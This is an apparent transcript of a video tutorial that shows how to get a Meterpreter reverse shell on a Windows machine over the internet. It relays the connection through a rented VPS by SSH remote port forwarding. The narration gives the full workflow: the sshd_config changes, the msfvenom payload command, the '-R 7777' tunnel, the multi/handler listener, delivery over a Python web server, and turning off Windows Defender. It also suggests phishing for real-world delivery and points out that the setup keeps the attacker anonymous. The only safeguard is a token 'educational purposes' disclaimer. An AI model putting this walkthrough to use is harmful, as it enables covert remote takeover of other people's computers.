Disclaimer, this video is for educational purposes only. Hey guys, I'm Cybertronics and today I'm going to be showing you how to get a reverse shell over the internet using a method called SSH tunneling and port forwarding. So basically with SSH tunneling and port forwarding, what you're doing is you're tunneling traffic through a VPS or a virtual private server using SSH, right? So how it works is we're going to be telling our SSH VPS to remotely port forward our ports, and then we're going to be connecting via our local machine to our VPS using SSH, and we're going to be specifying to the SSH protocol that we want to basically grab all that traffic connecting to the VPS and port forward it to a port listening on our local machine, okay? So that's basically the simple terms of what we're doing today. So the goal of this is to have basically a proxy over the internet for our connection, right? So instead of us connecting our payload to our personal computer, we're going to be connecting it to our VPS in the cloud, and then our VPS in the cloud is going to move that connection over to our local machine via SSH tunneling and port forwarding, okay? So we're going to see how we do that in this video. So without further ado, let's go ahead and get started. Alright guys, so first things first, before we get started with any payloads or connections or any of that stuff, you're going to need a VPS for this video or a virtual private server. And you can go to digitalocean.com and start one up there, or you can use Amazon, Linode, etc. There's a full list of providers you can look up, but I'm just using DigitalOcean for now, and this is not a free thing, guys. You're going to have to, pay money for these virtual private servers. Although it's not too expensive, as you can see right here, I've only accumulated about 19 cents. I don't use it too often, but often enough for 19 cents to be cheap. So anyway, once you actually have your account and you've given a credit card or whatever payment method you're going to use, you can go ahead and get started. So to get started, we're going to spin up a droplet. Click on spin up droplet here, and it's going to ask you to choose the region closest to you guys. For me, it's New York, so it's already chosen. You can choose whichever one you want. It's going to ask you also to choose the image. I'm choosing Ubuntu since this is a simple server and we don't care about specifics. We're just going to use Ubuntu. Right here, we're going to choose regular disk type. We just want a cheap server. We don't care about nothing too crazy, so we're going to put $6 a month. That's, as you can see right here, 0.009 an hour. We're going to use a password. I'm going to just go ahead and type my password here. Alright, and now once we've given it all those options, we're going to hit create droplet, and it's going to create the droplet for us, and now we can start with creating the payload and doing all that good stuff, right? Alright guys, so before we generate any payloads or execute them or any of that stuff, first we're going to configure our VPS to tunnel our traffic via port forwarding to our local machine, right? So to do that, we're going to log into our machine that we just created, and we're going to say SSH root at, and you're going to put the IP address, the public IP address of the machine you created. It's right here on DigitalOcean. As you can see, you can just copy it, and we're going to go back to our terminal, paste that, hit enter. It's going to ask you for the fingerprint, hit yes, and it's going to ask you for the password. We're going to put in our password. All right, and now we're logged in, guys. So once we're logged in, the first thing you want to do is you want to say nano/etsy/ssh/sshd_config, and you're going to hit enter, and that's going to bring up the configuration file for the SSH on the VPS. So the only thing we're going to do here is we're going to modify two options. You're going to go all the way down, and you want to uncomment right here where it says allow TCP port forwarding. You want to take out the comment, and then you want to change the no from no to yes, and that's gonna like it says allow TCP port forwarding, so it's gonna allow you to port forward any TCP connections that you get, right? So down here we're gonna say gateway ports yes, and you're gonna type it exactly how you see it. It's case sensitive, and once you do that on Nano, you're gonna hit Control X and yes, enter, and it's gonna save that. So now we're gonna actually reboot our VPS, and once we reboot the VPS, we're gonna go ahead and generate our payload and then send it to the target and execute it, and then we're gonna get our reverse shell over the internet. So for the payload, guys, we're just going to be using a simple meterpreter shell. We're not going to be encoding it or any of that stuff. We're not trying to evade detection today, so we're just using this for an example today. So we're going to generate with msfvenom a payload right now. So we're going to say msfvenom, and you're going to put tag P for payload, Windows/meterpreter/reverse TCP, because this is a Windows payload. And for the L host, you're going to change here the IP address to the public IP address of your VPS, because we're going to be actually connecting to our VPS, and then our VPS is going to be sending the traffic to our local machine via the remote port forwarding that we're going to be doing. Okay, so you're going to put the public IP address of the VPS you created on whatever provider you are using, and you're going to put whatever L port you want of your choice. Doesn't matter which one it is, as long as it's available to use. And for the L port, you're going to specify which one you want, and then tag F for the file type. This is an exe since this is a Windows payload. And for the output of the file name, we're just going to name it payload. You can name it whatever you want, .exe. So once you've got all that entered, you're going to hit enter, and it's going to generate the payload. All right, guys, and now that we got our payload generated, we can actually go ahead and set up our local host with a listener using the Metasploit framework, and we're also going to set up the VPS's remote port forwarding settings. All right, so let's first set up the remote port forwarding on our VPS. So to do that, we're just going to go ahead and SSH tag capital R. This is to specify the SSH to do remote port forwarding on the machine you're connecting to, so that it port forwards all the connections on that machine onto the listening port on your local machine. Okay, so tag R. For this payload in particular, we're going to specify 777 on both. You can use the same ports on both the VPS and the local machine, by the way, just to make it easier. So I just chose 7777, and we're going to put that and the local host IP, and that's usually 127.0.0.1 or localhost or 0.0.0, right? So colon, and then we're going to specify the other port that we're using on the VPS, which is also 7777, and we're going to put root at and the IP address of our VPS. I'm going to copy that, paste, and it's going to ask you for the password. We're going to put that in. All right, guys, and once you're logged on, you're already set, good to go, since we already configured the settings for the SSH beforehand. All we had to do now was just SSH into the machine with the remote port forwarding option like we just did, and specify the ports that we're using. So now that we've got that done, we're gonna go ahead and set up our listener on our local machine. So let's go ahead and open up Metasploit. So let's say MSF console. All right, guys, and once you got Metasploit open, you're gonna go ahead and type use exploit /multi/handler, and that's gonna open the listener for you. And we're gonna set the payload before we do anything else. So we're gonna put Windows/meterpreter/reverse TCP, because that's the payload we used when we generated the payload using msfvenom. So hit enter, and we're gonna see the options we have here. Since this is just a listener, it's very simple. We got two options. We got L host and L port. We're gonna change both of those. We're gonna put for the L host our local machine IP address, which is gonna be 127.0.0.1 or localhost, or whichever one of those you want to use. And we're just gonna say set L host 127.0.0.1, hit enter, and set L port to the port we specified when generating the payload. It doesn't have to be the same as the one that you're sending to the VPS, but to keep things simple, we're just gonna use the same port that we're using on the VPS to listen, and that's 7777, right? So we're gonna set that, we're gonna hit run, and now, guys, we've got our listener set up. So all we've got to do now is get the payload onto the target and execute the payload, and we're gonna get a connection to our VPS, and then our VPS is gonna tunnel that connection to our local machine through our SSH remote port forwarding that we've got set up right here. As you can see, we're still logged in to our VPS, but we're using the tag capital R to tell SSH to port forward remotely from this machine, right? So whatever connection we get on this VPS is going to be port forwarded to our local machine through this command right here that you see. Okay, so that's how it works. So let's go ahead and get back into it. All right, guys, so now our goal is to get the payload onto the target machine. You know, in a real world scenario, you know, you could do it many ways. You could use a phishing campaign, emails, physical access, you name it, right? But for this example, since we have the target machine in our possession and we just want to show the example, we're just going to go ahead and download the payload via our browser using a local Python web server, okay? So we're going to host our payload on a local Python web server. You're going to go to the directory that you had your payload in, and you're just going to say python3 tac-m http.server, and you're going to put the port you want it to serve on. In this case, I'm just going to use the default, which is 80. So we're going to hit enter, and now we're going to go to our target machine, open up a web browser, and download the payload, okay? All right, guys, so now that we're on our target machine, before we do anything else, let's go ahead and disable Windows Defender, because like I said, this is not an AV evasion video. I'll probably make some of that in the future. I'll definitely make some of that in the future. But for right now, we're just gonna go ahead and turn off Windows Defender so we can show you the example of this payload being executed and then the connection being tunneled through the VPS to our local machine, okay? So let's go to Windows Defender, turn that off, go to Virus and Threat Protection, Manage Settings, and we're gonna turn off real-time protection, right? And now that we've turned that off, let's go ahead and open up a web browser, go to incognito so we don't leave any trace of the payload that we're downloading. So we're gonna hit HTTP 10.0.0.157. That is the local IP address of my Kali VM, guys. So, you know, for you guys to find it, I'm sure by now you should be able to find the IP address of your Kali VM. So you're gonna put in the IP address of your Kali VM or whatever VM you're using hosting the payload, and we're just gonna specify the payload's name. After that, payload.exe, hit enter, and as you can see, it's gonna download the payload. So now all that's left to do is execute it and we'll get our connection, right? So let's go ahead and execute our payload. We're gonna double click it. Windows is gonna ask us to run it anyway. And if we go back to our listener here in the Metasploit framework, we're gonna see that it is connecting, guys. And there you go, we've got a meterpreter session. Just type in help, you know, it gives us a list of commands. We could basically do whatever we want now. We could pivot, we could privilege escalate, all that good stuff. And yeah, guys, this is how you can, you know, hack over the internet using SSH tunneling, right? So this also keeps your connection encrypted and secure. So, you know, it makes it significantly harder to, you know, sniff the traffic that, you know, you got going on in this connection and all that. It could help keep you anonymous as well. So, you know, a lot of good reasons to do this if you're doing ethically, right? I'm not saying to go out and do anything illegal. So this is only for educational purposes only. And I hope you guys learned something. I hope you guys enjoyed the video. Without further ado, let's get up out of here.